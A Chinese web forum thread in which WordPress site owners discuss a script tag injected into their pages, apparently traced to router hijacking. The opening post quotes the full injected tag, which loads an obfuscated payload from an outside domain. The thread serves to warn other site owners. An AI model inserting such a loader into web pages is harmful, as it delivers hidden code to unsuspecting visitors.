affpay 发表于 2016-12-22 11:15:51

用wordpress的查下看看自己中马了没

查了几个自己的wp程序的网站 首页最下边都被嵌入了以下代码


<script src="http://a.qkkjd.com/rr/t?d=d%2bv4qu57SzajeygZY9LjcWIUiC4iA3cMijXCdG1e9GxObzQhZmW768C%2f0SsedHFWN8w4dyRMXoVYVmZ1yArKfk%2fR6kt3s8B41pC48DjfhvgWNyuhhg1dwfwYQiZDhQxIVlRWpezzlm80qlsYz4EyS3B5xEqChyouqFomjVSnlsW%2f%2fFPDhfnwd%2b0OsrcBHdTUQ1cXqFHVg2uK%2bIDQTW%2bDGwSZ5aXMEaL%2bJfbATLjB4pLcBl92hNYWSMm5nFsfBouBf%2fh4FncfspLYsSmvSqPwcxZXKDXWrMADFbyI5ztIxmGWE24odAgm3ttGyBqINB0Fd1g20inCLULQuW6u3MyZq0TFs9rGxnQ5OT%2fHhbg3c0yq5oCaYHmzJVxnHZE4KYmi3z7w%2fssp0B%2bYW7ntDdERoMw9k%2b%2bst8jlDUcBHFZkhJ%2frmdB6UsiUF7%2fP5Pch%2f5I6SPlLv4FF8NFsm6IstB3FFBhMF57e6pkHNSKog%2fs11J0XeOu4oh%2fvM5Gs3FXKcSy18lB3hnNJ%2ffG%2bgT8gOSFLKmxyET9HhOkPw7s9ZqYmIU%2bkGkg9oxYdn2jyrHq%2bLdQ0j7AtwjpN79uUIu%2fcN5XHUxdw0nvRDhO%2fPg4hU%2bOdXLC5Kj1Ol54jTHVUl1d0GHi90tLubMn1KAXIWvnTUG6bi7HFcQMIddOFpHm5tN1SOuv%2fjSO%2fojwU3jQ7CieOsfi3golrNHbLCa6zdTH85AHnAQ%3d%3d" charset="utf-8"></script>

LNMP环境的没逃过
其他主机商的的也没避免
看来是某个漏洞导致的

affpay 发表于 2016-12-22 11:28:31

刚才看了下著名的 wp模版开发网站也没避免www.loome.net

另外还有
www.solagirl.net
http://jpmoban.com/
http://www.aiweinews.com/
www.srxtuan.com

当然还有一些没有被攻破的

我查遍了模版 也没找到代码
不知道是不是系统漏洞

affpay 发表于 2016-12-22 18:57:09

总算找到原因了不是浏览器插件的问题
原来是路由器被劫持了
https://www.v2ex.com/t/327971

wxfly 发表于 2016-12-23 12:02:27

回复 1# 的帖子

我也发现了,你是哪个地区的?电信吗?我湖南电信

wxfly 发表于 2016-12-23 12:22:56

回复 1# 的帖子

我用的就是小米路由,有什么办法解决吗?

smartweb 发表于 2016-12-24 09:44:45

我以前用的斐讯免费路由也插入一个js,本来没什么感觉网络被搞慢了就刷了第三方固件。刷了之后我刷回来也刷不了其它第三方固件了。
页: [1]
查看完整版本: 用wordpress的查下看看自己中马了没